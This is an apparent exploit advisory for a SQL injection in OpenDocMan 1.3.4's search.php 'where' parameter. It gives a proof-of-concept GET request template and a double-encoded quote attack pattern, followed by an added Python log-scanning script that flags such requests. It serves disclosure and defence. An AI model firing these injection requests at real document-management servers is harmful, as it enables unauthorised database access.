
OpenDocMan 1.3.4 - 'search.php where' SQL Injection


XenoG


===========================================================================================
# Exploit Title: OpenDocMan 1.3.4 - 'where' SQL Injection
# CVE: N/A
# Date: 05/03/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
# Software Link: https://sourceforge.net/projects/opendocman/files/
# Version: v1.3.4
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: OpenDocMan is a web based document management system (DMS)
#   written in PHP designed to comply with ISO 17025 and OIE standard for document
#   management. It features fine grained control of access to files, and automated
#   install and upgrades.
===========================================================================================
# POC - SQLi
# Parameters : where
# Attack Pattern : %2527
# GET Request :
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
===========================================================================================
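
For defenders, a log check for the pattern reported above. This is an added example, not part of the original post or of OpenDocMan. It scans access-log lines for requests to search.php whose `where` parameter, after repeated percent-decoding, is not a plain identifier. The log lines, the value `author_only`, and the rule that a legitimate `where` value contains only letters, digits and underscores are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate `where` value is a plain field selector.
SAFE_WHERE = re.compile(r"[A-Za-z0-9_]*")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable, so %2527 -> %27 -> ' is seen as a quote."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_where(log_line):
    """Return the decoded `where` value if it is not a plain identifier, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/search.php"):
        return None
    # parse_qs does the first decoding round; fully_decode handles the rest.
    for raw in parse_qs(url.query, keep_blank_values=True).get("where", []):
        value = fully_decode(raw)
        if not SAFE_WHERE.fullmatch(value):
            return value
    return None


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Mar/2019:10:00:01 +0000] "GET /opendocman/search.php'
    '?submit=submit&sort_by=id&where=author_only&sort_order=asc HTTP/1.1" 200 5120',
    '192.0.2.11 - - [05/Mar/2019:10:00:07 +0000] "GET /opendocman/search.php'
    '?submit=submit&sort_by=id&where=%2527&sort_order=asc HTTP/1.1" 200 312',
    '192.0.2.12 - - [05/Mar/2019:10:00:09 +0000] "GET /opendocman/index.php'
    '?where=%2527 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hit = suspicious_where(line)
        if hit is not None:
            print("suspicious where=%r in: %s" % (hit, line))
```

The same identifier-only rule can be enforced server-side as an allow-list on `where` before the value reaches any SQL string.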
            